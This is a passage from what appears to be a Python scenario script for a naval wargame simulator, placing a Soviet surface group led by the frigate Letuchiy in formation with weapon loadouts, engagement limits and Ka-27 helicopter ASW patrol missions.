"Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1135 Burevestnik'
unit.unitName = "Letuchiy"
unit.SetPosition(14.233189, 67.882095, 0.0)
unit.heading = 46.18
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '53-65M', 2)
SM.SetUnitLauncherItem(unit.unitName, 1, '53-65M', 2)
SM.SetUnitLauncherItem(unit.unitName, 2, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 3, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 4, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 5, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 6, 'RPK-3 Metel', 4)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Letuchiy", '53-65M', 8)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 0.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.254028, 1.187456, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.262348, 1.189906, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.270299, 1.191123, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.274493, 1.191760, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.279261, 1.193445, 0.000000, 0.000000)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1171 Tapir'
unit.unitName = "Nikolay Vilkov"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0607
lat_deg = 57.296*leader_track.Lat + -0.0012
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 45.72
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M32 Strela 2', 12)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Nikolay Vilkov", '9M32 Strela 2', 24)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(2.551, 0.358, -2.459, 0.339)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1171 Tapir'
unit.unitName = "BDK-13"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0213
lat_deg = 57.296*leader_track.Lat + -0.0268
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 45.66
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M32 Strela 2', 12)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("BDK-13", '9M32 Strela 2', 24)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(3.175, 0.500, 2.624, 0.200)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1155 Fregat'
unit.unitName = "Udaloy"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0780
lat_deg = 57.296*leader_track.Lat + -0.0315
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 46.24
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '9M330 Kinzhal', 64)
SM.SetUnitLauncherItem(unit.unitName, 1, '100mm OF-58 FRAG', 46)
SM.SetUnitLauncherItem(unit.unitName, 2, '100mm OF-58 FRAG', 46)
SM.SetUnitLauncherItem(unit.unitName, 3, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 4, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 5, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 6, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 7, 'RPK-3 Metel', 8)
SM.SetUnitLauncherItem(unit.unitName, 8, '53-65M', 4)
SM.SetUnitLauncherItem(unit.unitName, 9, '53-65M', 4)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Udaloy", 'Fuel', 45900)
SM.AddToUnitMagazine("Udaloy", 'AT-1', 22)
SM.AddToUnitMagazine("Udaloy", 'DICASS (80) Sonobuoy', 135)
SM.AddToUnitMagazine("Udaloy", 'LOFAR (80) Sonobuoy', 135)
SM.AddToUnitMagazine("Udaloy", 'DIFAR (80) Sonobuoy', 378)
SM.AddToUnitMagazine("Udaloy", '30mm OF-84 HE-FRAG AK-630M', 944)
SM.AddToUnitMagazine("Udaloy", '100mm OF-58 FRAG', 700)
SM.AddToUnitMagazine("Udaloy", '53-65M', 24)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(2)
UI.SetFormationPosition(4.837, 0.500, 3.079, 0.200)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
SM.AddUnitToFlightDeck('Udaloy', 'Ka-27A', 'Fregat Ka-27 1', 1)
SM.SetFlightDeckUnitLoadout('Udaloy', 'Fregat Ka-27 1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
SM.AddUnitToFlightDeck('Udaloy', 'Ka-27A', 'Udaloy ASW-1', 2)
SM.SetFlightDeckUnitLoadout('Udaloy', 'Udaloy ASW-1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
FP = UI.GetFlightPortInfo()
base_track = UI.GetTrackById(UI.GetPlatformId())
mission_id = FP.AddGenericMission()
FP.AddAircraftToMission(mission_id, 'Udaloy ASW-1')
FP.AddAircraftToMission(mission_id, 'Fregat Ka-27 1')
FP.SetMissionLaunchTime(mission_id, '13:00:00+0m')
FP.SetMissionDatum(mission_id, 0.0000000, 0.0000000)
FP.SetMissionLandingTarget(mission_id, '')
FP.SetMissionWaveQuantity(mission_id, 1)
FP.SetMissionType(mission_id, '')
FP.SetMissionPatrolArea(mission_id, '-0.0029559,0.0023593,-0.0016718,0.0023831,-0.0014776,0.0011437,-0.0026294,0.0012958,')
FP.SetMissionPatrolAnchor(mission_id, 'Udaloy', 2)
FP.AddMissionWaypointAdvanced(mission_id, 0.2480410, 1.1851740, 2000.0, 200.0)
FP.SetMissionWaypointTasks(mission_id, 0, 'WaitForGroup,EngageAll')
FP.AddMissionWaypointAdvanced(mission_id, 0.2497580, 1.1855460, 3000.0, 300.0)
FP.SetMissionWaypointTasks(mission_id, 1, 'AirPatrolArea,EngageAll')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1164 Atlant'
unit.unitName = "Moskva"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0369
lat_deg = 57.296*leader_track.Lat + -0.0145
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 46.12
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '5V55RM', 64)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 2, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 3, '130mm F-44 HE', 100)
SM.SetUnitLauncherItem(unit.unitName, 4, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 5, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 6, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 7, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 8, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 9, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 10, '53-65M', 5)
SM.SetUnitLauncherItem(unit.unitName, 11, '53-65M', 5)
SM.SetUnitLauncherItem(unit.unitName, 12, '3M45 Granit', 16)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Moskva", 'Fuel', 68850)
SM.AddToUnitMagazine("Moskva", 'AT-1', 26)
SM.AddToUnitMagazine("Moskva", 'DICASS (80) Sonobuoy', 175)
SM.AddToUnitMagazine("Moskva", 'LOFAR (80) Sonobuoy', 175)
SM.AddToUnitMagazine("Moskva", 'DIFAR (80) Sonobuoy', 490)
SM.AddToUnitMagazine("Moskva", '30mm OF-84 HE-FRAG AK-630M', 1416)
SM.AddToUnitMagazine("Moskva", '130mm F-44 HE', 500)
SM.AddToUnitMagazine("Moskva", '53-65M', 30)
UI.SetSensorState(6, 1)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 0.000000, 0)
UI.AddTask('PointDefense', 3.000000, 3)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('InvMulti', '1')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
BB.Write('loadouts_dict', '{"Torpedoes": {"Ka-27A": {"T 1997": {"DICASS (90) Sonobuoy": 5, "AT-1": 2, "LOFAR (90) Sonobuoy": 5, "DIFAR (90) Sonobuoy": 14}, "T CHN 1982": {"DIFAR (75) Sonobuoy": 14, "DICASS (75) Sonobuoy": 5, "Yu-7": 2, "LOFAR (75) Sonobuoy": 5}, "T CHN 1987": {"DICASS (80) Sonobuoy": 5, "LOFAR (80) Sonobuoy": 5, "DIFAR (80) Sonobuoy": 14, "Yu-7": 2}, "T 1992": {"DICASS (85) Sonobuoy": 5, "LOFAR (85) Sonobuoy": 5, "DIFAR (85) Sonobuoy": 14, "AT-1": 2}, "T CHN 1977": {"DIFAR (70) Sonobuoy": 14, "DICASS (70) Sonobuoy": 5, "Yu-7": 2, "LOFAR (70) Sonobuoy": 5}, "T CHN 1997": {"DICASS (90) Sonobuoy": 5, "LOFAR (90) Sonobuoy": 5, "Yu-7": 2, "DIFAR (90) Sonobuoy": 14}, "T CHN 1972": {"DIFAR (65) Sonobuoy": 14, "DICASS (65) Sonobuoy": 5, "LOFAR (65) Sonobuoy": 5, "Yu-7": 2}, "T CHN 1992": {"DICASS (85) Sonobuoy": 5, "LOFAR (85) Sonobuoy": 5, "DIFAR (85) Sonobuoy": 14, "Yu-7": 2}, "T 2002": {"DICASS (95) Sonobuoy": 5, "LOFAR (95) Sonobuoy": 5, "AT-1": 2, "DIFAR (95) Sonobuoy": 14}, "T 2012": {"DICASS (105) Sonobuoy": 5, "AT-1": 2, "LOFAR (105) Sonobuoy": 5, "DIFAR (105) Sonobuoy": 14}, "T 2007": {"DICASS (100) Sonobuoy": 5, "LOFAR (100) Sonobuoy": 5, "AT-1": 2, "DIFAR (100) Sonobuoy": 14}, "T CHN 2007": {"DICASS (100) Sonobuoy": 5, "LOFAR (100) Sonobuoy": 5, "Yu-7": 2, "DIFAR (100) Sonobuoy": 14}, "T CHN 2012": {"DICASS (105) Sonobuoy": 5, "AT-1": 2, "LOFAR (105) Sonobuoy": 5, "DIFAR (105) Sonobuoy": 14}, "T CHN 2002": {"DICASS (95) Sonobuoy": 5, "LOFAR (95) Sonobuoy": 5, "Yu-7": 2, "DIFAR (95) Sonobuoy": 14}, "T 1982": {"DIFAR (75) Sonobuoy": 14, "DICASS (75) Sonobuoy": 5, "AT-1": 2, "LOFAR (75) Sonobuoy": 5}, "T 1987": {"DICASS (80) Sonobuoy": 5, "LOFAR (80) Sonobuoy": 5, "DIFAR (80) Sonobuoy": 14, "AT-1": 2}}}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(2.286, 0.632, 3.082, 0.278)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
SM.AddUnitToFlightDeck('Moskva', 'Ka-27A', 'Atlant Ka-27 1', 1)
SM.SetFlightDeckUnitLoadout('Moskva', 'Atlant Ka-27 1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
FP = UI.GetFlightPortInfo()
